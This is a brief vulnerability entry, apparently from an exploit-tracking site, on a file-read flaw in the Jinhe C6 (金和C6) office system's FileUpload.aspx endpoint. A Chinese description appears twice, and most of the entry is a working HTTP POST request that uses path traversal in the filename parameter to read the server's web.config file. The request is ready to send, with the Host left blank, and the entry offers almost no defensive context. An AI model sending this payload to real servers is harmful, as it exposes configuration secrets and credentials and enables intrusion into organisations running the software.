Description
金和C6 FileUpload.aspx 存在文件读取漏洞,利用此漏洞可获取服务器敏感信息。
金和C6 FileUpload.aspx 存在文件读取漏洞,利用此漏洞可获取服务器敏感信息。
POST /c6/JHSoft.WCF/FunctionNew/FileUpload.aspx/ HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
filename=../../../c6/web.config
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.